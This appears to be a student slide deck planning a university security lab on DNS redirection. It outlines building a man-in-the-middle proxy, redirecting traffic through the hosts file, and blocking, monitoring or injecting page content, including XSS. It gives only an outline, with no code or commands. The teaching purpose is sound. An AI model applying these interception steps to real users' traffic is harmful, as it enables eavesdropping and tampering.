Date post: | 26-Dec-2015 |
Category: |
Documents |
Upload: | ada-nichols |
View: | 222 times |
Download: | 2 times |
WHERE WERE WE LAST TIME?
• Rough outline of the content of the lab
• Real world connections
• General explanation of DNS
PROGRESS SINCE LAST UPDATE
• Researched various sources
• Helps our understanding
• Can provide resources in lab as hints
• Fleshed out ideas into main steps of lab
• Answered questions posed by Professor
SOURCES COMPILED
• DNS Archetecture
• The Hosts File and What it can do for you
• Decrypting SSL traffic with Wireshark and ways to prevent it
• Traffic Analysis with Wireshark
• Using Wireshark to Decode
SSL/TLS Packets
• Investigation of DHCP Packets using Wireshark
• Wireshark Lab: DNS
• Wireshark User’s Guide
• Man in the Middle Attack: Tutorial
BACKGROUND REQUIRED
• What is DNS
• Using Wireshark
• Socket Programming (C, C++, Java)
• Proxies
• Man-in-the-Middle Attack
• Cookies
Professor Egele asked about using compiled vs. non-compiled languages:• Compiled would be
better to simulate a “virus” which can be spread and execute remotely
STEP 1: RECONNAISSANCE
• Use Wireshark to examine the following about HTTP and DNS packets sent to your “target” website:
• What is the IP address associated with that website?
• Where is the traffic going from/to?
• What information is being sent in the HTTP packets?
• Is any of the information encrypted? If so, how does this complicate this process?
• What ports are being used?
Professor Egele asked about DNS vs HTTP
STEP 2: CONTROL SYSTEM
• Use Java, C, or C++ to create a man-in-the-middle proxy which does the following:
• Accepts incoming connections on the same port that we found was used before
• Can support outbound connections to the localhost
• Can read and edit the content which is received and sent between these connections
• This is the basic framework
• We will add more functionality later
STEP 3: REDIRECT
• Edit the hosts file to redirect traffic to your control system
• Use wireshark to ensure that the packets are being properly redirected
• How are the DNS packets different?
• How are the HTTP packets different?
• Can the client still communicate with the server?
• What are the limitations of this technique?
• What are the limitations on editing hosts files?
• Are there other ways to accomplish the same goal?
STEP 4: EXPLOIT
• Block all access to the “target” site.
• What are different ways this can be done?
• Redirect the user to a completely different site
• Monitor the traffic for “keywords”
• Send some sort of warning to the “attacker” whenever a site has those words
• Replace content from the site with completely new content
• Change/censor part of the content
• Add content to the site presented to the user
• Can this be used in the context of XSS? (hint: yes)
Suggested by Professor Egele
STEP 5: CONTEXT
• What sort of access does an attacker need to execute this?
• What protections are there to prevent this?
• Does SSL/HTTPS stop this? What can it do?
• How has this been applied on larger scales?
• Can this be done for an entire local network, rather than a single computer?
• How would one go about that?
NEXT STEPS
• Write out lab in Twiki with formatting and questions
• Test lab
• Figure out the timing/difficulty of each question
• Narrow down sources and decide what information to provide